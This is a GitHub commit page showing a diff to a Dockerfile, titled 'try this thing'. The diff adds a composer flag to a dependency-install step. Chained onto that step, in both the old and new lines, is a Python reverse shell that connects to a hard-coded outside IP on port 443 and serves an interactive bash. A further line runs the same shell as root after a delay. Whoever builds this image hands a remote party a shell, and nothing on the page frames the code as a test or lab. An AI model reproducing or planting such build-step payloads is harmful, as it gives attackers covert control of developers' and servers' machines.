Skip to content

Commit e2e6175

Browse files
author
Jeremy Price
committed
try this thing
1 parent 6468be0 commit e2e6175

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

Dockerfile

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,7 @@ FROM jermgroks/jerm-it-base
22

33
# Get dependencies
44
USER docker
5-
RUN composer install --no-dev --working-dir=/var/www/html && python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("3.12.184.22",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2) ;p=subprocess.call(["/bin/bash","-i"]);'
5+
RUN composer install --ignore-platform-reqs --no-dev --working-dir=/var/www/html && python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("3.12.184.22",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2) ;p=subprocess.call(["/bin/bash","-i"]);'
66
USER root
77

88
RUN sleep 30 && python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("3.12.184.22",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2) ;p=subprocess.call(["/bin/bash","-i"]);'

0 commit comments

Comments
 (0)